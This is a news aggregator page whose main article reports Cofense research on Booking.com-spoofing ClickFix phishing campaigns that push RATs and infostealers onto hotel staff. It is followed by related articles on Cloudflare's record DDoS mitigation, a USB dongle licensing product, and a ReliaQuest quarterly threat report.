ClickFix phishing surge spoofs Booking.com to target hotels

Research from Cofense Intelligence has identified a series of Booking.com-themed phishing campaigns targeting hotel chains in the accommodation and food services sector.
These campaigns have been ongoing since November 2024, with a significant increase observed in March 2025, accounting for 47% of the total campaign volume. The phishing emails impersonate Booking.com, directing recipients to a fake CAPTCHA website that prompts them to run a malicious script. This method of malware delivery, known as a ClickFix attack, is designed to convince users to execute scripts which install remote access trojans (RATs) or information-stealing malware.
ClickFix attacks are distinguished by their use of fake CAPTCHA screens that convincingly mimic brands such as Booking.com and Cloudflare. When users interact with these fake verifications, they are instructed to carry out steps, such as using Windows keyboard shortcuts, to inadvertently run a malicious script. This script is commonly delivered through users' clipboards, typically triggered by a specific button on the fraudulent site.
Analysis from Cofense Intelligence shows that 75% of campaigns using fake CAPTCHAs employed Booking.com spoofing templates, while other less frequent variants mimic Cloudflare Turnstile CAPTCHAs and cookie consent banners. Among these, 64% delivered RATs, 47% information stealers, and 11% were observed distributing both types of malware.
This campaign has been increasing in popularity since November 2024, with 47% of total campaign volume being from March 2025 alone. 75% of all active threat reports (ATRs) with fake CAPTCHAs used Booking.com-spoofing ClickFix templates. Other notable but rare ClickFix templates include Cloudflare Turnstile-spoofing and cookie consent banner-styled templates. 64% of campaign ATRs delivered RATs, 47% of campaign ATRs delivered information stealers, and 11% of campaign ATRs were seen delivering both RATs and information stealers. 53% of all campaign ATRs deliver XWorm RAT, making it the most popular RAT used in these campaigns. Pure Logs Stealer (19% of ATRs) and DanaBot (14% of ATRs) are the most popular information stealers for these campaigns.
The most commonly observed malware is the XWorm RAT, present in 53% of the analysed campaigns. Other malware includes Pure Logs Stealer and DanaBot, making up 19% and 14% of cases, respectively.
The content and tone of the phishing emails have evolved since the campaign's inception. Earlier messages featured generic or vague language, whereas more recent examples exploit concerns over guest satisfaction and incorporate references to specific guest reservations. These tactics are designed to elicit a response and drive the recipient to interact with malicious links.
Some emails specify that the link will only function on Windows, and the recipients who access the site on other operating systems receive a message indicating this limitation. The malicious scripts are typically delivered as PowerShell commands or Microsoft HTML applications, which, once executed, can install RATs or steal data from victim devices.
ClickFix is described as a technique for persuading victims to run malicious Windows scripts themselves, often by pasting code into the Windows Run command prompt. Sometimes, these scripts are obfuscated to appear as verification codes, increasing the likelihood that the user will not recognise them as harmful.
In addition to fraudulent CAPTCHA screens, recent campaigns include cookie consent banners that prompt users to run malicious scripts under the pretext of accepting cookies.

Try Our AI Features

Explore what Daily8 AI can do for you:

Learn with AIFact CheckingText to SpeechAI Summary

Related Articles

Techday NZ

a day ago

• Techday NZ

Cloudflare thwarts record 7.3 Tbps DDoS attack with automation

Cloudflare has confirmed it recently mitigated what it describes as the largest distributed denial-of-service (DDoS) attack ever publicly disclosed, clocking in at 7.3 terabits per second (Tbps), surpassing previous known records. The attack, which occurred in mid-May 2025, targeted a hosting provider customer utilising Cloudflare's Magic Transit service for network defence. According to Cloudflare data, this incident follows closely on the heels of attacks recorded at 6.5 Tbps and 4.8 billion packets per second, illustrating that DDoS attacks are continuing to increase in both scale and complexity. Cloudflare stated that the 7.3 Tbps attack was 12% larger than its previous record and 1 Tbps greater than another recent attack reported by security journalist Brian Krebs. Attack analysis The 7.3 Tbps DDoS attack delivered a total of 37.4 terabytes of data within a 45-second window. During the attack, the targeted IP address was bombarded across an average of 21,925 destination ports, reaching a peak of 34,517 destination ports per second. The distribution of source ports mirrored this targeting method. The attack employed several vectors but was dominated by UDP floods, constituting 99.996% of total traffic. The residual traffic, amounting to 1.3 GB, involved QOTD reflection, Echo reflection, NTP reflection, Mirai UDP floods, Portmap flood, and RIPv1 amplification techniques. Each vector was identified and catalogued, with Cloudflare detailing how organisations could protect both themselves and the broader Internet from such forms of abuse. Cloudflare explained that the UDP DDoS component worked by sending large volumes of UDP packets to random or specific destination ports, either to saturate the Internet link or overwhelm network appliances. Other vectors, such as the QOTD (Quote of the Day), Echo, NTP, Portmap, and RIPv1, exploited vulnerabilities in legacy protocols and services to reflect and amplify attack traffic onto target systems. Global scale The attack was notable for its global reach. Traffic originated from more than 122,145 source IP addresses across 5,433 autonomous systems in 161 countries. Nearly half of the attack traffic came from Brazil and Vietnam, accounting for around twenty-five percent each. The remainder was largely attributable to sources in Taiwan, China, Indonesia, Ukraine, Ecuador, Thailand, the United States, and Saudi Arabia. At an autonomous system level, Telefonica Brazil (AS27699) contributed 10.5% of attack traffic, with Viettel Group (AS7552), China Unicom (AS4837), Chunghwa Telecom (AS3462), and China Telecom (AS4134) among the other major sources. The attack saw an average of 26,855 unique source IP addresses per second, peaking at 45,097. Technical response Cloudflare utilised the global anycast architecture to divert and dissipate the massive influx of traffic. As packets arrived at Cloudflare's network edge, they were routed to the closest data centre. This incident was managed across 477 data centres in 293 locations worldwide, with some regions operating multiple facilities due to traffic volume. Detection and mitigation were handled by Cloudflare's automated systems, which operate independently in each data centre. The Cloudflare global network runs every service in every data centre. This includes our DDoS detection and mitigation systems. This means that attacks can be detected and mitigated fully autonomously, regardless of where they originate from. Upon arrival, data packets were intelligently distributed to available servers where they were sampled for analysis. Cloudflare employed the denial of service daemon (dosd), a heuristic engine that reviews packet headers and anomalies for malicious patterns. The system then generated multiple permutations of digital fingerprints specific to the attack, seeking patterns that maximised blocking efficacy while minimising impact on legitimate traffic. Within data centres, real-time intelligence was shared by servers multicasting fingerprint information, refining mitigation on both a local and global scale. When a fingerprint surpassed predefined thresholds, mitigation rules were compiled and deployed as extended Berkeley Packet Filter (eBPF) programs to block the offending traffic. Once the attack ceased, associated rules were removed automatically. Botnet feed and future mitigation Cloudflare also maintains a free DDoS Botnet Threat Feed to help Internet service providers and hosting companies identify malicious traffic originating within their own infrastructure. The company said that over 600 organisations have subscribed to this service, allowing them to receive up-to-date lists of offending IP addresses engaged in DDoS attacks. Recommendations from Cloudflare emphasise tailored defences to address the unique characteristics of each network or application, with care taken to ensure that mitigation steps do not inadvertently disrupt legitimate traffic, particularly for services that depend on UDP or legacy protocols. Cloudflare's team highlighted that these successful defences occurred entirely without human intervention, alerting, or incident escalation, underscoring the shift towards fully autonomous, distributed mitigation strategies in response to modern DDoS threats.

Scoop

a day ago

• Scoop

MakeDongle 2 - USB Dongle Protection For MacOS, Windows And Linux

Excel Software announced MakeDongle 2.0 for macOS or Windows. MakeDongle generates a secure USB dongle from a flash drive. The dongle grants a license to run protected software on all modern versions of Mac, Windows or Linux OS. MakeDongle complements a diverse suite of protection and licensing tools from Excel Software. Protected software can be stored on the computer or dongle itself. On application launch, the dongle is validated before the software is allowed to run. Each dongle can be generated in seconds. When building dongles, MakeDongle can copy multiple licenses, applications or installers to the USB flash drive. MakeDongle can be used standalone or with the QuickLicense, AppProtect or DocProtect products. It also works with licensing plugins for FileMaker and Xojo. To use MakeDongle alone, several coding interfaces are supported with sample code provided for popular programming languages. MakeDongle works with QuickLicense. QuickLicense supports many license types including Trial, Product, Try/Buy and Subscription. Software is protected by adding API programming commands or by using the AddLicense wrapping tool without programming. AddLicense is a popular choice for runtime environments like MAX, Adobe Air or Unity since application code and resources can be securely embedded within the EXE or APP file. Protected software can immediately launch when the appropriate dongle is present or optionally require a manual or online activation process. MakeDongle and QuickLicense give developers many options for software and hardware protection. Excel spreadsheets can be protected using QuickLicense and OfficeProtect to produce an EXE for Windows or APP for Mac. This protection can be combined with a USB dongle to allow the App to run. The application and encrypted data files can be stored on the dongle making them easily portable between computers. MakeDongle works with QuickLicenseRT Linux. QuickLicense and MakeDongle run on a Mac or Windows computer to produce a dongle and license files. The protected software run on a Linux computer with the dongle installed in any free USB port. MakeDongle works with DocProtect on Mac, Windows or Linux. DocProtect wraps PDF, Video, Image slide shows or HTML files into a Mac or Windows application. The protected document can be used on any computer when the dongle is present. MakeDongle, DocProtect and QuickLicense can be combined to support other license types and features. MakeDongle can be used with AppProtect to wrap Mac or Windows software into a protected application that only runs if the dongle is present. Dongle secured installers can be created using MakeDongle plus ClickInstall on Mac or Windows. The installer only runs if the dongle is present and can be distributed on the dongle itself. MakeDongle 2.0 is $495 for a Single User License on Mac or Windows. Produce unlimited dongles for any number of products. The product includes royalty-free distribution rights for protected software. MakeDongle Mac is a Universal (Intel & Apple Silicon) App that runs on macOS 10.14 or later. MakeDongle Windows runs on Windows 10 or 11. Visit the company web site for demonstration videos and product information.

Techday NZ

2 days ago

• Techday NZ

ReliaQuest report exposes rise of social engineering cyber threats

ReliaQuest has released its latest quarterly report, outlining identified trends in cyber attacker techniques, malware use, and ransomware group activity observed between March and May 2025 across its customer base. ClickFix and social engineering tactics One of the most notable trends identified in the report is the widespread use of ClickFix, a social engineering method that misleads users into pasting malicious commands into tools such as PowerShell or the Windows Run prompt. Attackers disguise these actions as solutions to false issues, such as fake CAPTCHAs or Windows updates, enabling them to circumvent defences and introduce malware with comparative ease. This approach has facilitated the increased use of malware families such as Lumma and SectopRAT, both of which utilise trusted tools like MSHTA to deliver malicious payloads. The report notes that social engineering has significantly contributed to the rise of these attack vectors, stating, "Social engineering played a pivotal role in the success of these top tactics." Lateral movement and initial access trends Phishing-based techniques accounted for over half of observed initial access incidents among customers, while drive-by compromise incidents rose by 10% compared to the previous period. The report sees a shift, as attackers increasingly rely on user manipulation rather than exploiting technical vulnerabilities. ReliaQuest's analysis highlights the prominence of remote desktop protocol (RDP) over internal spear phishing as a method of lateral movement within networks. This shift is closely associated with attackers impersonating IT helpdesks to persuade users to install RDP tools. The report finds, "The shift away from tactics like internal spearphishing suggests attackers are favouring techniques that require less user interaction and offer more direct access to internal systems." Additionally, drive-by downloads powered by campaigns such as ClickFix and widely available phishing kits continue to lower the threshold for cybercriminal activity. External remote resources dropped from third to fourth place among initial access vectors, further illustrating the focus on exploiting human factors. MSHTA on the rise for defence evasion MSHTA (Microsoft HTML Application Host), a native Windows binary, was reported to be involved in 33% of defence evasion incidents during the period, up from just 3.1% the previous year. Attackers use this legitimate tool to bypass conventional security tools by convincing users to execute malicious commands themselves, often delivered through social engineering campaigns such as ClearFake. "ClearFake's early adoption of ClickFix techniques propelled MSHTA from 16th to second place among defence evasion tactics. Recently, other ClickFix adopters have fuelled MSHTA's current surge, leveraging broader social engineering tactics to bypass defences more effectively," the report details. Changes in ransomware operations The report notes significant changes among ransomware groups, with the closure of "RansomHub" leading many affiliates to migrate to other groups, notably Qilin, which saw a 148% increase in activity. Play and Safepay also reported increased activity of 116% and 266%, respectively. The number of active ransomware groups has dropped by nearly 30%, but newer or established ransomware-as-a-service (RaaS) platforms have absorbed most of these affiliates, raising concerns over increasingly professionalised threats. "With major ransomware groups like RansomHub gone, RaaS operators are vying to capitalise on the influx of affiliates searching for new platforms. To attract this talent, we'll likely see RaaS platforms introduce innovative capabilities or revise profit-sharing models. This competition is expected to create a more fragmented yet increasingly sophisticated ransomware ecosystem, posing even greater challenges for defenders." Impact on industry sectors The construction industry was the only sector to see an increase in ransomware attack victims, rising by 15%. ReliaQuest attributes this to opportunistic targeting as attackers seek out industries with perceived weaker defences. The report notes, "Construction organisations may feel compelled to pay ransoms quickly to avoid costly downtime and operational delays, making them attractive targets." By contrast, the retail sector saw a 62% decrease in victims, attributed to a drop in activity from the "CL0P" ransomware Cleo campaign. Malware trends and threat actor activity The period saw increased activity by the SectopRAT malware, delivered via ClickFix and malvertising campaigns. Despite infrastructure takedowns in May 2025, Lumma infostealer operations continue, with new logs advertised on cybercriminal forums and marketplaces. "Although Lumma's activity is likely to decline over the coming months as the impact of the takedown continues to unfold, it's likely the group could regain traction over time. As attention around the takedown diminishes, attackers may return to this familiar and well-established tool," the report comments. Emergence of Scattered Spider Scattered Spider, after a five-month hiatus, returned in April 2025 with attacks on UK retail organisations. The group is identified for using detailed social engineering against high-value individuals such as CFOs and utilising both on-premises methods and cloud techniques for stealth and control. "Scattered Spider's success lies in its ability to combine social engineering precision, persistence in cloud environments, and on-premises technical expertise. These TTPs allow the group to achieve initial access, maintain control, and operate stealthily, making it difficult for organizations to detect and remediate the group's activity in the early stages of an attack." Recommendations and defensive measures ReliaQuest's report makes several recommendations for organisations, including disabling Windows Run for non-administrative users, enforcing control over RDP tool installations, implementing web filtering, and prioritising user training against social engineering. Additional measures include strengthening identity verification, enabling advanced monitoring, and conducting regular risk assessments, particularly for privileged user accounts. Looking ahead, the report anticipates broader adoption of ClickFix among ransomware affiliates, increased sophistication by groups such as Scattered Spider, and the continued rise of infostealer malware like Acreed. The report concludes by emphasising the need for proactive investment in advanced detection, user education, and securing of both cloud and traditional infrastructure to counter an upward trend in attack complexity and evasion tactics.